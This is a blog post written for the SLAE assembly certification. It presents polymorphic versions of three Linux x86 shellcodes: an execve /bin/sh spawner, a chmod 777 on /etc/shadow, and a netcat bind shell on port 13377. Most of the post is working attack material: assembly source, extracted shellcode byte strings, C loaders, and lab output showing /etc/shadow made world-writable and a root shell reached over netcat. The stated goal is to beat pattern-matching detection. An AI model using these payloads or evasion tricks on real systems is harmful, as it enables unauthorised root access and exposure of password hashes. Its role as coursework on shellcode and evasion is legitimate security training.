<!DOCTYPE html><html lang="en" data-mode="dark" ><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><meta name="generator" content="Jekyll v4.3.0" /><meta property="og:title" content="SLAE - Assignment 6 - Polymorphic Shellcode" /><meta name="author" content="fwinsnes" /><meta property="og:locale" content="en" /><meta name="description" content="Introduction" /><meta property="og:description" content="Introduction" /><link rel="canonical" href="https://whitecr0wz.github.io/posts/SLAE-Polymorphic/" /><meta property="og:url" content="https://whitecr0wz.github.io/posts/SLAE-Polymorphic/" /><meta property="og:site_name" content="Knowledge Library" /><meta property="og:type" content="article" /><meta property="article:published_time" content="2021-01-19T05:44:00+00:00" /><meta name="twitter:card" content="summary" /><meta property="twitter:title" content="SLAE - Assignment 6 - Polymorphic Shellcode" /><meta name="twitter:site" content="@whitecr0wz" /><meta name="twitter:creator" content="@fwinsnes" /> <script type="application/ld+json"> {"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"fwinsnes"},"dateModified":"2021-01-19T05:44:00+00:00","datePublished":"2021-01-19T05:44:00+00:00","description":"Introduction","headline":"SLAE - Assignment 6 - Polymorphic Shellcode","mainEntityOfPage":{"@type":"WebPage","@id":"https://whitecr0wz.github.io/posts/SLAE-Polymorphic/"},"url":"https://whitecr0wz.github.io/posts/SLAE-Polymorphic/"}</script><title>SLAE - Assignment 6 - Polymorphic Shellcode | Knowledge Library</title><link rel="apple-touch-icon" sizes="180x180" href="/assets/img/favicons/apple-touch-icon.png"><link rel="icon" type="image/png" sizes="32x32" href="/assets/img/favicons/favicon-32x32.png"><link rel="icon" type="image/png" sizes="16x16" href="/assets/img/favicons/favicon-16x16.png"><link rel="manifest" href="/assets/img/favicons/site.webmanifest"><link rel="shortcut icon" href="/assets/img/favicons/favicon.ico"><meta name="apple-mobile-web-app-title" content="Knowledge Library"><meta name="application-name" content="Knowledge Library"><meta name="msapplication-TileColor" content="#da532c"><meta name="msapplication-config" content="/assets/img/favicons/browserconfig.xml"><meta name="theme-color" content="#ffffff"><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://fonts.gstatic.com" crossorigin><link rel="dns-prefetch" href="https://fonts.gstatic.com" crossorigin><link rel="preconnect" href="https://fonts.googleapis.com" ><link rel="dns-prefetch" href="https://fonts.googleapis.com" ><link rel="preconnect" href="https://cdn.jsdelivr.net" ><link rel="dns-prefetch" href="https://cdn.jsdelivr.net" ><link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato&family=Source+Sans+Pro:wght@400;600;700;900&display=swap"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.11.2/css/all.min.css"><link rel="stylesheet" href="/assets/css/style.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/magnific-popup@1/dist/magnific-popup.min.css"> <script src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js"></script><body data-spy="scroll" data-target="#toc" data-topbar-visible="true"><div id="sidebar" class="d-flex flex-column align-items-end"><div class="profile-wrapper text-center"><div id="avatar"> <a href="/" class="mx-auto"> <img src="https://whitecr0wz.github.io/assets/img/Felipe-Winsnes.jpeg" alt="avatar" onerror="this.style.display='none'"> </a></div><div class="site-title mt-3"> <a href="/">Knowledge Library</a></div><div class="site-subtitle font-italic">Just sharing interesting tech stuff :)</div></div><ul class="w-100"><li class="nav-item"> <a href="/" class="nav-link"> <i class="fa-fw fas fa-home ml-xl-3 mr-xl-3 unloaded"></i> <span>HOME</span> </a><li class="nav-item"> <a href="/categories/" class="nav-link"> <i class="fa-fw fas fa-stream ml-xl-3 mr-xl-3 unloaded"></i> <span>CATEGORIES</span> </a><li class="nav-item"> <a href="/tags/" class="nav-link"> <i class="fa-fw fas fa-tag ml-xl-3 mr-xl-3 unloaded"></i> <span>TAGS</span> </a><li class="nav-item"> <a href="/archives/" class="nav-link"> <i class="fa-fw fas fa-archive ml-xl-3 mr-xl-3 unloaded"></i> <span>ARCHIVES</span> </a><li class="nav-item"> <a href="/about/" class="nav-link"> <i class="fa-fw fas fa-info-circle ml-xl-3 mr-xl-3 unloaded"></i> <span>ABOUT</span> </a></ul><div class="sidebar-bottom mt-auto d-flex flex-wrap justify-content-center align-items-center"> <a href="https://twitter.com/whitecr0wz" aria-label="twitter" target="_blank" rel="noopener"> <i class="fab fa-twitter"></i> </a></div></div><div id="topbar-wrapper"><div id="topbar" class="container d-flex align-items-center justify-content-between h-100 pl-3 pr-3 pl-md-4 pr-md-4"> <span id="breadcrumb"> <span> <a href="/"> Home </a> </span> <span>SLAE - Assignment 6 - Polymorphic Shellcode</span> </span> <i id="sidebar-trigger" class="fas fa-bars fa-fw"></i><div id="topbar-title"> Post</div><i id="search-trigger" class="fas fa-search fa-fw"></i> <span id="search-wrapper" class="align-items-center"> <i class="fas fa-search fa-fw"></i> <input class="form-control" id="search-input" type="search" aria-label="search" autocomplete="off" placeholder="Search..."> </span> <span id="search-cancel" >Cancel</span></div></div><div id="main-wrapper" class="d-flex justify-content-center"><div id="main" class="container pl-xl-4 pr-xl-4"><div class="row"><div id="core-wrapper" class="col-12 col-lg-11 col-xl-9 pr-xl-4"><div class="post pl-1 pr-1 pl-md-2 pr-md-2"><h1 data-toc-skip>SLAE - Assignment 6 - Polymorphic Shellcode</h1><div class="post-meta text-muted"> <span> Posted <em class="" data-ts="1611035040" data-df="ll" data-toggle="tooltip" data-placement="bottom"> Jan 19, 2021 </em> </span><div class="d-flex justify-content-between"> <span> By <em> Felipe Winsnes </em> </span><div> <span class="readtime" data-toggle="tooltip" data-placement="bottom" title="1394 words"> <em>7 min</em> read</span></div></div></div><div class="post-content"><h4 id="introduction"><span class="mr-2">Introduction</span><a href="#introduction" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>These series of posts starting with the prefix “Assignment” will be created in order to fulfill the requirements of the SLAE certification.</p><p>According to wikipedia, “Polymorphic code is code that uses a polymorphic engine to mutate while keeping the original algorithm intact. That is, the code changes itself each time it runs, but the function of the code (its semantics) will not change at all. For example, 1+3 and 6-2 both achieve the same result while using different values and operations.”. This could include as well garbage instructions which do not affect execution at all. Nevertheless, it helps to beat pattern matching.</p><p>Today we are going to dive a little deep within Polymorphic shellcode. However, instead of using an engine, we will generate it with our own hands!</p><p>The sixth assignment from the seven requires taking three <a href="https://es.wikipedia.org/wiki/Shellcode">shellcodes</a> from <a href="http://shell-storm.org/">shell-storm.org</a> and generate polymorphic versions of such. In addition, its size should not be bigger than 50%.</p><h4 id="execve-shellcode-shellcode-1"><span class="mr-2">Execve Shellcode (Shellcode #1)</span><a href="#execve-shellcode-shellcode-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>The first shellcode from the three will be one that executes <code class="language-plaintext highlighter-rouge">/bin/sh</code> through the <code class="language-plaintext highlighter-rouge">execve</code> syscall. It can be found <a href="http://shell-storm.org/shellcode/files/shellcode-827.php">here</a>.</p><h6 id="original-code">Original code</h6><pre><code class="language-term">xor    eax,eax
push   eax
push   0x68732f2f
push   0x6e69622f
mov    ebx,esp
push   eax
push   ebx
mov    ecx,esp
mov    al,0xb
int    0x80
</code></pre><p>There are infinite ways to modify such shellcode. For instance, “NOP equivalents” could be used, which add no functionality whatsoever and difficult pattern matching. Furthermore, the value <code class="language-plaintext highlighter-rouge">/bin/sh</code> that is pushed within the instructions <code class="language-plaintext highlighter-rouge">push 0x68732f2f</code> and <code class="language-plaintext highlighter-rouge">push 0x6e69622f</code> could be reduced by 1 and then incremented while being saved on a specific registers instead of directly the stack.</p><h6 id="final-code">Final code:</h6><pre><code class="language-term">global _start

_start:

       sahf                      ; Should store instructions. However, it is used as a NOP equivalent.

       xor    eax,eax            ; Zeroes out EAX.
       pushad                    ; Should save the current flags. However, it is used as a NOP equivalent.
       push   eax                ; Pushes the dword of EAX (0x00000000).

       cld                       ; Should clear the direction flag. However, it is used as a NOP equivalent.
       mov esi, 0x68732f2e       ; Saves value "hs/.". If incremented by 1, it should possess value "hs//".
       inc esi                   ; Increments ESI.
       cdq                       ; Zeroes out EDX. Also a NOP Equivalent.
       mov edi, 0x6e69622e       ; Saves value "nib.". If incremented by 1, it should possess value "bin/".
       inc edi                   ; Increments EDI.

       push esi                  ; Pushes the value of ESI ("hs//").
       std                       ; NOP Equivalent.
       push edi                  ; Pushes the value of EDI ("bin/").

       mov ebx, esp              ; Saves the value of ESP in EBX.
       cld                       ; NOP Equivalent.
       cmc                       ; NOP Equivalent.

       mov al, 11                ; Calls execve.
       int 0x80                  ; Calls to kernel.
</code></pre><p>Let’s dump the shellcode and test it!</p><pre><code class="language-term">root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/1_shellcode# nasm -f elf32 1.asm -o 1.o &amp;&amp; ld 1.o -o 1 
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/1_shellcode# objdump -d ./1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 
's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x9e\x31\xc0\x60\x50\xfc\xbe\x2e\x2f\x73\x68\x46\x99\xbf\x2e\x62\x69\x6e\x47\x56\xfd\x57\x89\xe3\xfc\xf5\xb0\x0b\xcd\x80"
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/1_shellcode#
</code></pre><pre><code class="language-term">#include&lt;stdio.h&gt;
#include&lt;string.h&gt;

unsigned char code[] = \
"\x9e\x31\xc0\x60\x50\xfc\xbe\x2e\x2f\x73\x68\x46\x99\xbf\x2e\x62\x69\x6e\x47\x56\xfd\x57\x89\xe3\xfc\xf5\xb0\x0b\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
</code></pre><h4 id="endgame-1"><span class="mr-2">EndGame #1</span><a href="#endgame-1" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><pre><code class="language-term">root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/1_shellcode# gcc polymorphic.c -o polymorphic -fno-stack-protector -z execstack -w 
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/1_shellcode# ./polymorphic 
Shellcode Length:  30
#
</code></pre><p>Original Size: 23 bytes Final Size: 30 bytes</p><p>Increment: 31%</p><h4 id="chmod-shellcode-shellcode-2"><span class="mr-2">Chmod Shellcode (Shellcode #2)</span><a href="#chmod-shellcode-shellcode-2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>The second shellcode from the three will be one that performs a <code class="language-plaintext highlighter-rouge">chmod</code> operation on the file <code class="language-plaintext highlighter-rouge">/etc/shadow</code> with privileges <code class="language-plaintext highlighter-rouge">777</code>. It can be found <a href="http://shell-storm.org/shellcode/files/shellcode-590.php">here</a>.</p><h6 id="original-code-1">Original code:</h6><pre><code class="language-term">xor    eax,eax
push   eax
mov    al,0xf
push   0x776f6461
push   0x68732f63
push   0x74652f2f
mov    ebx,esp
xor    ecx,ecx
mov    cx,0x1ff
int    0x80
inc    eax
int    0x80
</code></pre><p>There aren’t many things that we can do. Nonetheless, we can apply similar techniques as we did on the previous shellcode.</p><h6 id="final-code-1">Final code:</h6><pre><code class="language-term">; Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-590.php

global _start

_start:

       dec ebp            ; NOP Equivalent.

       xor eax, eax       ; Zeroes out EAX.
       cdq                ; Zeroes out EDX.
       push edx           ; Pushes the dword of EDX (0x00000000).
       mov al, 0xf        ; Moves value of syscall chmod into AL.

       sahf               ; NOP Equivalent.
       push 0x776f6461    ; woda

       cld                ; NOP Equivalent.
       push 0x68732f63    ; hs/c

       push 0x74652f2f    ; te//
       cdq                ; NOP Equivalent.

       mov ebx, esp       ; Copies value from ESP to EBX.
       pushfd             ; NOP Equivalent.
       mov cx, 0x1ff      ; Value that means in octal "0777".
       cmc                ; NOP Equivalent.
       int  0x80          ; Call to kernel.

       inc eax            ; Increment EAX to 1, value for syscall exit().
       pushad             ; NOP Equivalent.
       int 0x80           ; Call to kernel.
</code></pre><p>Let’s dump the shellcode and test it!</p><pre><code class="language-term">root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode# nasm -f elf32 1.asm -o 1.o &amp;&amp; ld 1.o -o 1 
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode# objdump -d ./1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 
's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x4d\x31\xc0\x99\x52\xb0\x0f\x9e\x68\x61\x64\x6f\x77\xfc\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x99\x89\xe3\x9c\x66\xb9\xff\x01\xf5\xcd\x80\x40\x60\xcd\x80"
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode#
</code></pre><pre><code class="language-term">#include&lt;stdio.h&gt;
#include&lt;string.h&gt;

unsigned char code[] = \
"\x4d\x31\xc0\x99\x52\xb0\x0f\x9e\x68\x61\x64\x6f\x77\xfc\x68\x63\x2f\x73\x68\x68\x2f\x2f\x65\x74\x99\x89\xe3\x9c\x66\xb9\xff\x01\xf5\xcd\x80\x40\x60\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
</code></pre><h4 id="endgame-2"><span class="mr-2">EndGame #2</span><a href="#endgame-2" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><pre><code class="language-term">root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode# gcc polymorphic.c -o polymorphic -fno-stack-protector -z execstack -w 
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode# ls -la /etc/shadow
-rw-r--r-- 1 511 12079 1115 Dec 28 10:33 /etc/shadow
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode# ./polymorphic 
Shellcode Length:  39
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode# ls -la /etc/shadow 
-rwxrwxrwx 1 511 12079 1115 Dec 28 10:33 /etc/shadow
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/2_shellcode# 
</code></pre><p>Original Size: 33 bytes Final Size: 39 bytes</p><p>Increment: 19%</p><h4 id="netcat-shellcode-shellcode-3"><span class="mr-2">Netcat Shellcode (Shellcode #3)</span><a href="#netcat-shellcode-shellcode-3" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><p>Finally, the third shellcode from the three will be one that performs a bind shell connection in port 13377 through the netcat application. It can be found <a href="http://shell-storm.org/shellcode/files/shellcode-804.php">here</a>.</p><h6 id="original-code-2">Original code:</h6><pre><code class="language-term">section .text
    global _start
_start:
xor eax,eax
xor edx,edx
push 0x37373333
push 0x3170762d
mov edx, esp
push eax
push 0x68732f6e
push 0x69622f65
push 0x76766c2d
mov ecx,esp
push eax
push 0x636e2f2f
push 0x2f2f2f2f
push 0x6e69622f
mov ebx, esp
push eax
push edx
push ecx
push ebx
xor edx,edx
mov  ecx,esp
mov al,11
int 0x80
</code></pre><p>Similarly to the techniques implemented within the previous shellcode, we will insert NOP equivalents which will difficult pattern matching. Nevertheless, these won’t change execution at all!</p><h6 id="final-code-2">Final code:</h6><pre><code class="language-term">; Original Shellcode: http://shell-storm.org/shellcode/files/shellcode-804.php

global _start

_start:

       sahf                    ; NOP Equivalent.
       nop                     ; NOP Equivalent.
       cmc                     ; NOP Equivalent.

       xor eax,eax             ; Zeroes out EAX.
       mul edx                 ; Zeroes out EDX through mul. NOP Equivalent.
       push eax                ; NOP Equivalent.
       pop edx                 ; NOP Equivalent.
       push edx                ; NOP Equivalent.
       pop eax                 ; NOP Equivalent.

       push 0x37373333         ; 7733
       std                     ; NOP Equivalent.
       push 0x3170762d         ; 1pv-
       mov edx, esp            ; Copies the value of ESP into EDX.
       push eax                ; Pushes EAX null dword (0x00000000)
       push 0x68732f6e         ; hs/n
       std                     ; NOP Equivalent.
       push 0x69622f65         ; ib/e
       sahf                    ; NOP Equivalent.
       push 0x76766c2d         ; vvl-
       mov ecx,esp             ; Copies the value of ESP into ECX

       push eax                ; NOP Equivalent.
       push 0x636e2f2f         ; cn//
       cmc                     ; NOP Equivalent.
       push 0x2f2f2f2f         ; ////
       inc edi                 ; NOP Equivalent.
       inc esi                 ; NOP Equivalent.

       push 0x6e69622f         ; nib/
       mov ebx, esp            ; Copies the value of ESP into EBX.
       push eax                ; Pushes EAX null dword (0x00000000)
       cld                     ; NOP Equivalent.
       push edx                ; Pushes value of EDX
       push ecx                ; Pushes value of ECX
       nop                     ; NOP Equivalent.
       push ebx                ; Pushes value of EBX
       cdq                     ; NOP Equivalent.
       mov  ecx,esp            ; Copies value from ESP to ECX
       push esi                ; NOP Equivalent.
       pop edi                 ; NOP Equivalent.
       push edi                ; NOP Equivalent.
       pop esi                 ; NOP Equivalent.
       pop ebp                 ; NOP Equivalent.
       mov al,11               ; Call to execve().
       int 0x80                ; Call to kernel.
</code></pre><p>Let’s dump the shellcode and test it!</p><pre><code class="language-term">root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode# nasm -f elf32 1.asm -o 1.o &amp;&amp; ld 1.o -o 1 
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode# objdump -d ./1|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 
's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x9e\x90\xf5\x31\xc0\xf7\xe2\x50\x5a\x52\x58\x68\x33\x33\x37\x37\xfd\x68\x2d\x76\x70\x31\x89\xe2\x50\x68\x6e\x2f\x73\x68\xfd\x68\x65\x2f\x62\x69\x9e\x68\x2d\x6c\x76\x76\x89\xe1
\x50\x68\x2f\x2f\x6e\x63\xf5\x68\x2f\x2f\x2f\x2f\x47\x46\x68\x2f\x62\x69\x6e\x89\xe3\x50\xfc\x52\x51\x90\x53\x99\x89\xe1\x56\x5f\x57\x5e\x5d\xb0\x0b\xcd\x80"
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode#
</code></pre><pre><code class="language-term">root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode# cat polymorphic.c 
#include&lt;stdio.h&gt;
#include&lt;string.h&gt;

unsigned char code[] = \
"\x9e\x90\xf5\x31\xc0\xf7\xe2\x50\x5a\x52\x58\x68\x33\x33\x37\x37\xfd\x68\x2d\x76\x70\x31\x89\xe2\x50\x68\x6e\x2f\x73\x68\xfd\x68\x65\x2f\x62\x69\x9e\x68\x2d\x6c\x76\x76\x89\xe1
\x50\x68\x2f\x2f\x6e\x63\xf5\x68\x2f\x2f\x2f\x2f\x47\x46\x68\x2f\x62\x69\x6e\x89\xe3\x50\xfc\x52\x51\x90\x53\x99\x89\xe1\x56\x5f\x57\x5e\x5d\xb0\x0b\xcd\x80";

main()
{

  printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
</code></pre><h4 id="endgame-3"><span class="mr-2">EndGame #3</span><a href="#endgame-3" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h4><pre><code class="language-term">root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode# gcc polymorphic.c -o polymorphic -fno-stack-protector -z execstack -w 
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode# ./polymorphic 
Shellcode Length:  83
listening on [any] 13377 ...
192.168.100.139: inverse host lookup failed: Unknown host
connect to [192.168.100.200] from (UNKNOWN) [192.168.100.139] 54156

─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
root@whitecr0wz:~# rlwrap nc 192.168.100.200 13377 -v 
192.168.100.200: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.200] 13377 (?) open
python3 -c 'import pty;pty.spawn("/bin/bash")'
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode# id 
id 
uid=0(root) gid=0(root) groups=0(root)
root@SLAE:/home/whitecr0wz/assembly/assignments/Assignment_6/3_shellcode#
</code></pre><p>Original Size: 62 bytes Final Size: 83 bytes</p><p>Increment: 34%</p><h3 id="code"><span class="mr-2">Code</span><a href="#code" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3><p>This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: <a href="http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/">http://securitytube-training.com/online- courses/securitytube-linux-assembly-expert/</a></p><p>Student ID: SLAE-27812/PA-27812</p><p>You can find all of the used resources within this post <a href="https://github.com/whitecr0wz/SLAE/tree/main/Assignment_6">here</a>.</p></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/slae/'>SLAE</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/assembly/" class="post-tag no-text-decoration" >assembly</a> <a href="/tags/shellcoding/" class="post-tag no-text-decoration" >shellcoding</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"></div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=SLAE+-+Assignment+6+-+Polymorphic+Shellcode+-+Knowledge+Library&url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Polymorphic%2F" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=SLAE+-+Assignment+6+-+Polymorphic+Shellcode+-+Knowledge+Library&u=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Polymorphic%2F" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://t.me/share/url?url=https%3A%2F%2Fwhitecr0wz.github.io%2Fposts%2FSLAE-Polymorphic%2F&text=SLAE+-+Assignment+6+-+Polymorphic+Shellcode+-+Knowledge+Library" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i id="copy-link" class="fa-fw fas fa-link small" data-toggle="tooltip" data-placement="top" title="Copy link" data-title-succeed="Link copied successfully!"> </i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted"><div class="access"><div id="access-lastmod" class="post"><div class="panel-heading">Recently Updated</div><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/VyOS-OSPF-I/">VyOS - OSPF Basic Network</a><li><a href="/posts/Alignments-on-windows-registers/">Alignments on Windows Registers</a><li><a href="/posts/Vulnserver-LTER/">Vulnserver LTER - SEH Extremely restricted character set</a></ul></div><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><script src="https://cdn.jsdelivr.net/gh/afeld/bootstrap-toc@1.0.1/dist/bootstrap-toc.min.js"></script><div id="toc-wrapper" class="pl-0 pr-4 mb-5"><div class="panel-heading pl-3 pt-2 mb-2">Contents</div><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div id="tail-wrapper" class="col-12 col-lg-11 col-xl-9 pl-3 pr-3 pr-xl-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/SLAE64-Egghunter/"><div class="card-body"> <em class="small" data-ts="1611467040" data-df="ll" > Jan 24, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 3 - Egghunter</h3><div class="text-muted small"><p> Introduction These series of posts starting with the prefix “SLAE64 - Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. Today we are going to have a clo...</p></div></div></a></div><div class="card"> <a href="/posts/SLAE64-Encoder/"><div class="card-body"> <em class="small" data-ts="1611553440" data-df="ll" > Jan 25, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 4 - Custom Insertion Encoder</h3><div class="text-muted small"><p> Introduction These series of posts starting with the prefix “Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. Today we are going to have a close look ...</p></div></div></a></div><div class="card"> <a href="/posts/SLAE64-Analyzing-Shellcode/"><div class="card-body"> <em class="small" data-ts="1611639840" data-df="ll" > Jan 26, 2021 </em><h3 class="pt-0 mt-1 mb-3" data-toc-skip>SLAE64 - Assignment 5 - Analyzing 3rd party Shellcode</h3><div class="text-muted small"><p> These series of posts starting with the prefix “SLAE64 - Assignment” will be created in order to fulfill the requirements of the SLAE64 certification. The fifth assignment from the seven requires ...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/SLAE-Analyzing-Shellcode/" class="btn btn-outline-primary" prompt="Older"><p>SLAE - Assignment 5 - Analyzing 3rd party Shellcode</p></a> <a href="/posts/SLAE-Custom-Crypter/" class="btn btn-outline-primary" prompt="Newer"><p>SLAE - Assignment 7 - Custom Crypter</p></a></div></div></div><footer class="row pl-3 pr-3"><div class="col-12 d-flex justify-content-between align-items-center text-muted pl-0 pr-0"><div class="footer-left"><p class="mb-0"> © 2023 <a href="https://twitter.com/whitecr0wz">Felipe Winsnes</a>.</p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-sm-11 post-content"><div id="search-hints"><div id="access-tags"><div class="panel-heading">Trending Tags</div><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/shellcoding/">shellcoding</a> <a class="post-tag" href="/tags/assembly/">assembly</a> <a class="post-tag" href="/tags/vulnerability/">vulnerability</a> <a class="post-tag" href="/tags/networking/">Networking</a> <a class="post-tag" href="/tags/vyos/">VyOS</a> <a class="post-tag" href="/tags/ospf/">OSPF</a> <a class="post-tag" href="/tags/routing/">Routing</a> <a class="post-tag" href="/tags/soho/">SOHO</a></div></div></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a><div id="notification" class="toast" role="alert" aria-live="assertive" aria-atomic="true" data-animation="true" data-autohide="false"><div class="toast-header"> <button type="button" class="ml-2 ml-auto close" data-dismiss="toast" aria-label="Close"> <span aria-hidden="true">&times;</span> </button></div><div class="toast-body text-center pt-0"><p class="pl-2 pr-2 mb-3">A new version of content is available.</p><button type="button" class="btn btn-primary" aria-label="Update"> Update </button></div></div><script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"> {categories} {tags}</div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No results found.</p>', templateMiddleware: function(prop, value, template) { if (prop === 'categories') { if (value === '') { return `${value}`; } else { return `<div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>${value}</div>`; } } if (prop === 'tags') { if (value === '') { return `${value}`; } else { return `<div><i class="fa fa-tag fa-fw"></i>${value}</div>`; } } } }); </script> <script src="https://cdn.jsdelivr.net/combine/npm/magnific-popup@1/dist/jquery.magnific-popup.min.js,npm/lozad/dist/lozad.min.js,npm/clipboard@2/dist/clipboard.min.js"></script> <script src="https://cdn.jsdelivr.net/combine/npm/dayjs@1/dayjs.min.js,npm/dayjs@1/locale/en.min.js,npm/dayjs@1/plugin/relativeTime.min.js,npm/dayjs@1/plugin/localizedFormat.min.js"></script> <script defer src="/assets/js/dist/post.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.bundle.min.js"></script> <script defer src="/app.js"></script>
